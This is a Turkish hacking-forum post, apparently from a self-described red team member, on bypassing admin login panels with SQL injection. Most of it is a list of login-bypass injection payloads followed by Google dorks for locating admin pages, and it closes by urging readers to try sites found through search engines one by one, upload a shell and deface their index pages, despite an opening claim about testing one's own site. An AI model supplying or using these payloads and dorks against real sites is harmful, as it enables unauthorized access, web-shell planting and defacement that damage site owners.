MERHABA ARKADAŞLAR BEN ANKA RED TEAMDAN CROX BU KONUDA SİZLERE KOLAY Bİ YÖNTEM OLAN ADMİN PANEL BYPASS NEDİR ONU GÖSTERECEĞİM..
SQL Injection Saldırısı veya Veritabanı açığı saldırısı olarak ta bilinen ve halen birçok site için geçerli olan yöntemin güvenlik amaçlı kendi siteniz üzerinde nasıl deneyeceğinizi anlatacağım.
Genelde Windows sunucularında daha çok görülen ve Microsoft web uygulamalarının (ASP, ASP.NET) veritabanlarında karşılaşılan bir saldırı çeşididir. Microsoft Access ve MsSQL veritabanı kullanan sistemlerde bu güvenlik açığına çokça rastlanmaktadır.
PHP tabanlı MySQL, MariaDB ve benzeri veritabanı kullanan siteler içinde geçerlidir bu saldırı. Tabi PHP yapısı son zamanlarda özellikle CMS üzerinde yapılan yoğun çalışmalar ile SQL Injection saldırıları minimuma indirilmiştir.
Özellikle WordPress gibi gelişmiş bir CMS kullanıyorsanız bu yazılımda Zero-Day dediğimiz kritik güvenlik açığı bulmak hem zor hemde güncellemesi açık bulunduktan birkaç saat içinde yayınlanıyor. PHP tabanlı sitelerde ek olarak kullanıcının şifre bilgisi MD5 olarak kriptolandığı içinde bu saldırı çeşidi PHP sitelerde yapıldığı zaman ele geçirilen şifre bilgisi kriptolu olduğu için yönetim arayüzüne ulaşmak daha zordur.
Login Bypass Testi
SQL Injection Saldırısının en basit ve kendi sitenizde de deneyebileceğiniz yöntem olan Login Bypass, Kullanıcı adı ve Şifre kısmına Bypass edici meta kodlarını yazarak panele giriş yapabilmeyi göstereceğim. Bu saldırıyı deneme yanılma yolu ile yapabilirsiniz aşağıdaki kodları kullanarak.
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
İŞİNİZE YARAYACAK DORKLAR
Kod:
inurl/admin/admin/login.php
inurl:/admin/index.php
inurl:/adm/index.html
inurl:/adm/index.php
inurl:/admin-login.html
inurl:/admin-login.php
inurl:/admin.html
inurl:/admin.php
inurl:/admin/
KISACASI SİZE VERECEĞİM DORKLARDAN PANEL BULUP BU YUKARIDAKİ KODLARI USERNAME VE PASSWORD KISMINA YAPIŞTIRMANIZ GEREKİR.
BAZI ADMİN PANEL BYPASS DORKLARI
BU ŞEKİLDE KODLARI YAZIP PANELE GİRİŞ YAPARAK SHELL UPLOAD EDİP İNDEX BASABİLİRSİNİZ..
Evet arkadaşlar anlatacağım bu kadar bence fazlaya gerek yok.
Dediğim gibi siteye girmiyor diye bıkmayın bunun için googlede yandexte vs. dorkları aradağımızda önümüze çıkan siteleri tek tek deneyeceğiz
Birdahaki Konuda Görüşmek Üzere Hoşçakalın..